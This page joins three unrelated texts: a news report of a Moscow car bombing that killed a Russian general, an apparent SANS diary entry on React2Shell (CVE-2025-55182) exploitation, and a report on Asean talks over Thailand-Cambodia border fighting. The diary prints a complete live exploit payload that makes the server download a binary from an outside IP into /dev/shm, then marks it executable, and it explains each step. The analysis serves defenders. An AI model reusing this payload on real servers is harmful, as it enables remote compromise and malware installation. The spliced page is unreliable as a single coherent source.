Category: Uncategorized

A Russian general has been killed in a car bombing in Moscow, officials have said.

Russia’s Investigative Committee said Lt Gen Fanil Sarvarov died on Monday morning after an explosive device planted under a car detonated.

Sarvarov, 56, was the head of the armed forces’ operational training department, the committee added.

It said one theory being investigated was that the bomb was planted with the involvement of Ukrainian intelligence services. Ukraine has not commented.

Investigators have been sent to the scene, in a car park near an apartment block in the south of Russia’s capital.

Images from the area show a badly damaged white car with the doors blown out, surrounded by other vehicles in a parking lot.

Since Russia launched its full-scale invasion of Ukraine in February 2022, a number of military officials have been targeted in the Russian capital.

Gen Yaroslav Moskalik was killed in a car bomb attack in Moscow in April, while Gen Igor Kirillov died in December 2024 when a device hidden in a scooter was detonated remotely.

A Ukrainian source later told the BBC that Kirillov was killed by Ukraine’s security service, though this was never confirmed on the record. As a matter of policy, Ukraine never officially admits or claims responsibility for targeted attacks.

Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload:

------WebKitFormBoundaryxtherespoopalloverme

Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

------WebKitFormBoundaryxtherespoopalloverme

Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryxtherespoopalloverme

------WebKitFormBoundaryxtherespoopalloverme--

To make the key components more readable:

process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',

r=>r.pipe(process.mainModule.require('fs').

createWriteStream('/dev/shm/lrt').on('finish'

This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.

process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));

And then the script is marked as executable. It is unclear whether the script is explicitly executed. The Virustotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for react2shell. 

Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.

/dev/shm and /dev/tmp are typically world writable and should always work. /dev requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation to harden Linux systems is to create/tmp as its own partition and mark it as “noexec” to prevent it from being used as a scratch space to run exploit code. But this is sometimes tough to implement with “normal” processes running code in /tmp (not pretty, but done ever so often)

[1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection

—

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

Twitter|

South East Asia’s top diplomats met on Monday in Malaysia in a bid to end deadly border clashes between Thailand and Cambodia that have killed at least 41 people and displaced close to one million others.

They were seeking to revive a ceasefire that was brokered in July by Malaysia as chair of the Association of Southeast Asian Nations (Asean) and US President Donald Trump in July.

This was the first meeting between officials of Thailand and Cambodia since fighting resumed on 8 December. Both countries have blamed each other for the fresh hostilities.

The conflict dates back more than a century, when the borders of the two nations were drawn after the French occupation of Cambodia.

In his opening remarks, Malaysia’s foreign minister asked both sides and other Asean members to give the matter “our most urgent attention”.

“We must consider the wider ramifications of the continued escalation of the situation for the people we serve,” Mohamad Hasan told his counterparts, according to news agency AFP.

The most recent fighting has seen the exchange of artillery fire along the 800km (500-mile) border. Thailand has also launched air strikes targetting Cambodian positions.

The conflict has been the worst between Asean member states since the association was founded in 1967. The failure to contain it represents a serious blow to the bloc’s credibility.

Malaysian Prime Minister Anwar Ibrahim, who presided over the signing of the July ceasefire alongside Trump, said he was “cautiously optimistic” about Monday’s meeting in Kuala Lumpur.

“Our duty is to present the facts, but more importantly, to press upon them that it is imperative for them to secure peace,” he said last week.

Cambodia has said that the talks aim to restore “peace, stability and good neighbourly relations”, adding that it would reaffirm its position that the disputes should be resolved through peaceful means.

Thailand, while calling the meeting an important opportunity, reiterated its conditions for negotiations, including a declaration of ceasefire from Cambodia first and a “genuine and sustained” ceasefire.

The US and China have also been attempting to mediate a new ceasefire.

US Secretary of State Marco Rubio, who had a phone call with his Thai counterpart on Thursday, said that he hoped a new ceasefire could be reached by Monday or Tuesday.

China’s special envoy for Asian affairs, Deng Xijun, visited Phnom Penh last week. A statement from Beijing said he reaffirmed that China would continue to play a constructive role in facilitating dialogue between Cambodia and Thailand.

Additional reporting by BBC’s South East Asia Correspondent Jonathan Head